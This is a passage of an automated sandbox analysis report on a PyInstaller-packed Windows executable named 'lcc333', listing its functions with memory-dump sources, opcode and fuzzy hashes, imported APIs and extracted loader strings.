                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                          • Instruction ID: d6c315793da787b2845fac3b0f5cbd87db659ac14d7412a2591c6bde9b8820f7
                                                                                                                                                          • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                          • Instruction Fuzzy Hash: 6051D672A18E5191F7249F2AC48123877A1EB86B78FA84136CE4C17794EF3AE847C750
                                                                                                                                                          Function 00007FF714C95D30 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                          • Instruction ID: 666f0e5519f7ea67945c5de806373c50a464d8c697a1525a5b0924ee777cbdcd
                                                                                                                                                          • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                          • Instruction Fuzzy Hash: 5641B363C09F4B15E9A99D1ACE486B4A6809F337B0DDC12B6DD9D173C7ED0E658EC120
                                                                                                                                                          Function 00007FF714C99EA0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                          • Opcode ID: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                          • Instruction ID: 2b3cce7798299b55e9842e1bdb1e2527e5832f566eb92c00197e59ae9c186524
                                                                                                                                                          • Opcode Fuzzy Hash: 1c7003d4bfacf113f63307708dabd17e5ede6cda44dccf6aa27d02a6b9ea0481
                                                                                                                                                          • Instruction Fuzzy Hash: 7041E422714E5582EF04DF2BD9941A9E3A1BB49FE0B899437EE0D97B54EE3DD1468300
                                                                                                                                                          Function 00007FF714C980E4 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                          • Instruction ID: ddb99fc7c82c69c0a497c2de22327620135ae7adb51193991e52c441ad5b6017
                                                                                                                                                          • Opcode Fuzzy Hash: 2b8cddb4ee5dd57f1c7573491c8f445712dd312cb7e9e547cfd0f9c072f4c0c7
                                                                                                                                                          • Instruction Fuzzy Hash: EB31A732719F4281E754AF27A88013EE6D5AB86BF0F54423AEA5D93BD5EF3CD0058724
                                                                                                                                                          Function 00007FF714CA9570 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                          • Instruction ID: e80a5def7190238d2707a9726963f40886561e459a1a262ae33c7e7e60293d55
                                                                                                                                                          • Opcode Fuzzy Hash: 5d3ac10822f6242d2b374fc0e1218152d8e80c351f0dfcd4fab21387456caa74
                                                                                                                                                          • Instruction Fuzzy Hash: 9FF0C871B286918BDBA8EF6DB44362977D0F7483D0F84913AD58C83B14DA3CC0528F14
                                                                                                                                                          Function 00007FF714C8D30C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID:
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID:
                                                                                                                                                          • Opcode ID: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                          • Instruction ID: f180a569abda731ed027dc8aa18db410d42113cee71e6de150253cb79df475af
                                                                                                                                                          • Opcode Fuzzy Hash: 3c3909751b2697c6481bc0460501d6177e5cf72f77169ad8285d6e0cd944102a
                                                                                                                                                          • Instruction Fuzzy Hash: F2A0012290CC0BD0E644AF02E8E14B5A230FB56725BD00937E10E510A1AF2CA409D320
                                                                                                                                                          Function 00007FF714C85830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C85840
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C85852
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C85889
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C8589B
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C858B4
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C858C6
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C858DF
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C858F1
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C8590D
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C8591F
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C8593B
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C8594D
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C85969
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C8597B
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C85997
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C859A9
                                                                                                                                                          • GetProcAddress.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C859C5
                                                                                                                                                          • GetLastError.KERNEL32(?,00007FF714C864CF,?,00007FF714C8336E), ref: 00007FF714C859D7
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressErrorLastProc
                                                                                                                                                          • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                          • API String ID: 199729137-653951865
                                                                                                                                                          • Opcode ID: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                          • Instruction ID: 3394694cd300c49135d41db0d089c932158b7f1dee4ea12b45e8ef5af6a0e691
                                                                                                                                                          • Opcode Fuzzy Hash: a72b1b0889ffc37889110ad0e4f068dcb4eb8b0bbe2e77bf2d8672c26fae6e03
                                                                                                                                                          • Instruction Fuzzy Hash: BA22B376A49F0B81FA15FF67A8D55B4A3A0AF17B75BE41837C41E02264FF7CA44C8220
                                                                                                                                                          Function 00007FF714C881D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 00007FF714C89390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF714C845F4,00000000,00007FF714C81985), ref: 00007FF714C893C9
                                                                                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,00007FF714C886B7,?,?,00000000,00007FF714C83CBB), ref: 00007FF714C8822C
                                                                                                                                                            • Part of subcall function 00007FF714C82810: MessageBoxW.USER32 ref: 00007FF714C828EA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                          • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                          • API String ID: 1662231829-930877121
                                                                                                                                                          • Opcode ID: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                          • Instruction ID: 4de427e5cb3d7cb4966f9e870bbefef4ceb0d353bb102df3126b3ed927ba275f
                                                                                                                                                          • Opcode Fuzzy Hash: 9187bed43bf71c5340eadf58a1920dd2feb36a2730cc38c17813087cef3183ed
                                                                                                                                                          • Instruction Fuzzy Hash: A1517921A19E4391EA50BF16E8D61BAE251AF56760FD45833D60E426D5FE3CE50D8330
                                                                                                                                                          Function 00007FF714C82180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                          • String ID: P%
                                                                                                                                                          • API String ID: 2147705588-2959514604
                                                                                                                                                          • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                          • Instruction ID: 5e462357cd850baec87a4386e410f05c9cd8456bcbfcd018be76a1ce47eb3ba3
                                                                                                                                                          • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                          • Instruction Fuzzy Hash: 6251F726604BA186D6349F26E4581BAF7A1FB99B71F004122EFDE43694EF3CD049DB20
                                                                                                                                                          Function 00007FF714C880C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                          • String ID: Needs to remove its temporary files.
                                                                                                                                                          • API String ID: 3975851968-2863640275
                                                                                                                                                          • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                          • Instruction ID: 5b45a17a5ecac6194544e49824db05b73bb64181a081746830d44c20586cb60a
                                                                                                                                                          • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                          • Instruction Fuzzy Hash: 8A216726B09E4382E641AF7BF885169E250EF46FB0F984532DB1D437D8FE2CD5998230
                                                                                                                                                          Function 00007FF714C96290 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID: -$:$f$p$p
                                                                                                                                                          • API String ID: 3215553584-2013873522
                                                                                                                                                          • Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                          • Instruction ID: 5a83667a0a8d134935064edbc12cdd7207d48d37714481a3fdf81e8f6b71af08
                                                                                                                                                          • Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
                                                                                                                                                          • Instruction Fuzzy Hash: C9129161F0CA43A6FB24BE26D994279F691FB42760FC44137D68D466C4EB3CE588CB24
                                                                                                                                                          Function 00007FF714C90FC8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                          • String ID: f$f$p$p$f
                                                                                                                                                          • API String ID: 3215553584-1325933183
                                                                                                                                                          • Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                          • Instruction ID: 951f021cd1dd0549024a44329c8b7bec1b6c591e3de3192be59c719630100ac5
                                                                                                                                                          • Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
                                                                                                                                                          • Instruction Fuzzy Hash: 82128761E0C943A5FB647E16D886279F6A1FBC2770FD4403BD699466C4EF3CE5488B20
                                                                                                                                                          Function 00007FF714C81050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                          • Opcode ID: bdb51f189eec0aae26590c8a1b92bbb562030306dab734aaada4990c27a5542a
                                                                                                                                                          • Instruction ID: a804ba490360e5c13806be346a3de6e3473e1a42c8639c0ded0fa5c0beb11d5b
                                                                                                                                                          • Opcode Fuzzy Hash: bdb51f189eec0aae26590c8a1b92bbb562030306dab734aaada4990c27a5542a
                                                                                                                                                          • Instruction Fuzzy Hash: E3416066A0895391EA10FF13E8855B9E3D1BF86BA4FD44833ED0C47796EE3CE5098760
                                                                                                                                                          Function 00007FF714C81470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000000.00000002.2527143555.00007FF714C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF714C80000, based on PE: true
                                                                                                                                                          • Associated: 00000000.00000002.2527089267.00007FF714C80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527178490.00007FF714CAB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527278605.00007FF714CC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          • Associated: 00000000.00000002.2527332805.00007FF714CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff714c80000_lcc333.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                          • String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
                                                                                                                                                          • API String ID: 2050909247-3659356012
                                                                                                                                                          • Opcode ID: a8e221c47165c0dbec1a7dc4007f346f16716469ebf4d834264a8452580f1fe3
                                                                                                                                                          • Instruction ID: 7797027ab3559874f8b829cc79097f282e683fd458eec70bd9c108897ae69b26
                                                                                                                                                          • Opcode Fuzzy Hash: a8e221c47165c0dbec1a7dc4007f346f16716469ebf4d834264a8452580f1fe3
                                                                                                                                                          • Instruction Fuzzy Hash: 0F415222A08D4395EB10EF23D4815B9E390BF86BA4FD44933EE4D07B95EE3CE5498724
                                                                                                                                                          Function 00007FF714C8EA08 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
